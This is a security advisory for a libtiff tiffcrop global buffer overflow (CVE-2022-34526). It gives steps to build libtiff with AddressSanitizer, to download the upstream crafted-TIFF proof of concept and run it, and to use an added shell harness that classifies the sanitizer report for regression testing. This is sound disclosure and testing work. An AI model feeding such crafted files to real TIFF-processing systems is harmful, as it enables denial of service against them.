JFrog Security Research

XRAY-259933 - libtiff tiffcrop buffer overflow DoS

CVE-2022-34526 | CVSS 6.5

JFrog Severity: medium

Published 16 Nov. 2022 | Last updated 16 Nov. 2022

A global-memory buffer overflow in the libtiff library leads to denial of service when processing crafted TIFF images with tiffcrop.

Affected component: libtiff, no fixed release

A 4-byte global-memory buffer overflow occurs when tiffcrop is run with the -i argument against a crafted TIFF file, leading to a crash of tiffcrop.

Compile libtiff 4.4.0 with ASAN

# Fetch and unpack the 4.4.0 source tarball (-L follows redirects, -f fails on HTTP errors)
curl -fL https://gitlab.com/libtiff/libtiff/-/archive/v4.4.0/libtiff-v4.4.0.tar.gz -o libtiff-v4.4.0.tar.gz
tar -xf libtiff-v4.4.0.tar.gz
cd libtiff-v4.4.0
# Build with debug symbols and AddressSanitizer so the overflow is reported instead of silently corrupting memory
CC=gcc CXX=g++ CFLAGS="-ggdb -fsanitize=address" ./configure && make

Run the PoC

cd tools
# Download the crafted TIFF attached to the upstream issue
curl -fL https://gitlab.com/libtiff/libtiff/uploads/9943030806e03e7d2b8dff5ec0341b6f/poc.zip -o poc.zip
unzip poc.zip
# Crop with the -i (ignore read errors) option; ASAN reports a 4-byte global-buffer-overflow and tiffcrop aborts
./tiffcrop -i poc.tif a.tif
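A small regression harness for the two steps above, added here as an example and not part of the JFrog advisory or of libtiff: it runs the PoC against an ASAN-instrumented tiffcrop and classifies the sanitizer report, so a candidate fix can be checked against the same input while no fixed release exists. It assumes the paths from the steps above (tiffcrop and poc.tif in tools/); the function and file names are this example's own.

```shell
#!/bin/sh
# Added example (not JFrog's or libtiff's code). Usage, from the tools/ directory
# after the ASAN build above:  ./check_poc.sh ./tiffcrop poc.tif
# Exit code: 0 = no sanitizer report (build is clean on this input),
#            1 = ASAN reported an error, 2 = binary not found.

# Extract the sanitizer error kind (e.g. global-buffer-overflow) and the
# access size from an ASAN report captured on stderr.
# Prints "<kind> <size>" (size "?" if absent) or "none" when no report is found.
classify_asan_log() {
    log="$1"
    # ASAN's headline: "==<pid>==ERROR: AddressSanitizer: <kind> on address ..."
    kind=$(sed -n 's/.*ERROR: AddressSanitizer: \([A-Za-z_-]*\).*/\1/p' "$log" | head -n 1)
    if [ -z "$kind" ]; then
        echo "none"
        return 0
    fi
    # Access line: "READ of size N at ..." or "WRITE of size N at ..."
    size=$(sed -n 's/^[A-Z]* of size \([0-9]*\).*/\1/p' "$log" | head -n 1)
    echo "$kind ${size:-?}"
}

# Run tiffcrop -i on the PoC, capture stderr (where ASAN writes), and classify.
run_poc() {
    bin="${1:-./tiffcrop}"
    poc="${2:-poc.tif}"
    log="${3:-asan.log}"
    out="${4:-poc-out.tif}"
    if [ ! -x "$bin" ]; then
        echo "tiffcrop binary not found: $bin" >&2
        return 2
    fi
    # abort_on_error makes ASAN abort rather than continue after the first report
    ASAN_OPTIONS="abort_on_error=1" "$bin" -i "$poc" "$out" >/dev/null 2>"$log" || true
    result=$(classify_asan_log "$log")
    if [ "$result" = "none" ]; then
        echo "no sanitizer report for $poc"
        return 0
    fi
    echo "ASAN report for $poc: $result"
    return 1
}
```

When invoked directly, wrap it as `run_poc "$@"; exit $?` at the bottom of the script; the classifier is kept separate so it can be pointed at a saved log as well.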

No vulnerability mitigations are supplied for this issue.

References: Advisory & PoC exploit